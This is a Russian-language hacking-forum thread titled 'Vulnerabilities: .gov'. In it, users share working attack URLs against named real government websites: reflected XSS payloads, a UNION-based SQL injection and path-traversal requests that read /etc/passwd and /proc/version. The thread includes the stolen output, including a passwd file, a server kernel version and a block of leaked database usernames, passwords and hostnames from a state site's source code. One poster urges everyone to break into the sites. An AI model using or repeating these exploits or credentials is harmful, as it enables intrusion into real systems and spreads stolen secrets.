• XSS.stack #1 – первый литературный журнал от юзеров форума

Уязвимости: .gov

Отслеживать

Ŧ1LAN

CPU register
Пользователь
Регистрация
19.12.2005
Сообщения
1 057
Решения
1
Реакции
6
воть несколько XSS and SQL in .gov. ))))
1) _http://wwws.house.gov/search97cgi/s97_cgi/index.jsp?QueryText="><script>javascript:alert(/o_O/)</script>

2) _http://www.ic3.gov/search.aspx?q=<script>alert(/PREVED/)</script>

3) _http://www.californiadesert.gov/fullnews.php?page=-1%20union%20SELECT%201,2,3,4,5/*

Может кому и надо. я лично xss не оч люблю...
 
Вот ещё :pioneer:

.http://www.fasi.gov.ru/search/?text=%3Cscript%3E
javascript:alert(/Finder%20by%20nmb795/)%3C/script%3E
 
вот парнишка (к сожелению ника не помню) на ачате выложил (но тему потом в приват засунули):
_http://spaceflight.nasa.gov/realdata/sightings/cities/viewsighting.cgi?../../../../../../../../../etc/passwd%00|]http://spaceflight.nasa.gov/realda
ta/sight.../etc/passwd%00|
 
на
_http://spaceflight.nasa.gov/realdata/sight...roc/version%00|
он ответил:
Linux version 2.4.21-37.ELsmp (bhcompile@tweety.build.redhat.com) (gcc version 3.2.3 20030502 (Red Hat Linux 3.2.3-53)) #1 SMP Wed Sep 7 13:28:55 EDT 2005

Лол.. старый у них линукс... кароч все ломаем их.. у кого какие идеи?
 
www.usda.gov =))
_http://www.usda.gov/wps/portal/!ut/p/_s.7_0_A/7_0_1OB?
navid=SEARCH&q=%3Cscript%3Ealert
%28%22_n0Ldar_%22%29%3C%2Fscript%3E&Go_button.x=&Go_button.y=
 
Привет всем, я тут нуб - надеюсь ненадолго :) .
Вот парочка от меня (всё чтение файлов):
.http://pajk.arh.noaa.gov/cams.php?cam=../../../../../../../../../../etc/passwd
# смотрите сорц

.http://www.ok.gov/architects/index.php?s=../../../../../../../etc/passwd

.http://www.maine.gov/local/androscoggin/wales/meetings.php?tid=10&p=../../../../../../etc/passwd
 
[mod][not null:] Уважаемые, убедительная просьба не постить ссылки в открытом виде.[/mod]
 
_http://www.ok.gov/architects/index.php?s=../../renewal/renewal_functions.php
Код: 
[SPOILER= 3 у вас 43]

    if ($db == 'medlic')
    {  
       $dsn = array (
          'phptype'  => 'oci8',
          'username' => 'medical' ,
          'password' => 'medicaldbpass' ,
          'hostspec' => 'ok01'
        );
    }
    
    if ( $db  == 'arts')
    {
       $dsn = array (
                'phptype'  => 'oci8',
                'username' => 'artsdev' ,
                'password' => 'artsdevdbpass' ,
                'hostspec' => 'ok01'
              );
    }
    if ( $db  == 'portal' )
    {
       $dsn = array (
                'phptype'  => 'oci8',
                'username' => 'yok' ,
                'password' => 'diet2coke' ,
                'hostspec' => 'ok01'
              );
    }
    if ( $db  == 'arch' )
    {
       $dsn = array (
                'phptype'  => 'oci8',
                'username' => 'arch' ,
                'password' => 'archdbpass' ,
                'hostspec' => 'ok01'
              );
    }
    if ($db == "arsys")
    {
        $user = 'sa';
        $pass = 'phEDE4ra9R3ceF@d';
        $host = 'OABServer70';
        $db_name = 'ArSys';
        $dsn = "mssql://$user:$pass@$host/$db_name";

  }
  if ($db == "cansys")
  {
        $user = 'sa';
        $pass = 'phEDE4ra9R3ceF@d';
        $host = 'OABServer70';
        $db_name = 'CanSys';
        $dsn = "mssql://$user:$pass@$host/$db_name";

  }
  if ($db == "SE")
  {
	$user = 'sa';
	$pass = 'phEDE4ra9R3ceF@d';
	$host = 'OABServer70';
	$db_name = 'SE';
	$dsn = "mssql://$user:$pass@$host/$db_name";
  }

[/SPOILER]

гы )) дальше рыть времени нет.
 
http://idlastro.gsfc.nasa.gov/ftp/etc/passwd
Они как нарочно суются...
Добавлено в [time]1145913267[/time]
root:x:0:1:0000-Admin(0000):/:/bin/false
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
sys:x:3:3:0000-Admin(0000):/:
nobody:x:60001:60001:uid no body:/:/bin/false
noaccess:x:60002:60002:uid no access:/:/bin/false
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх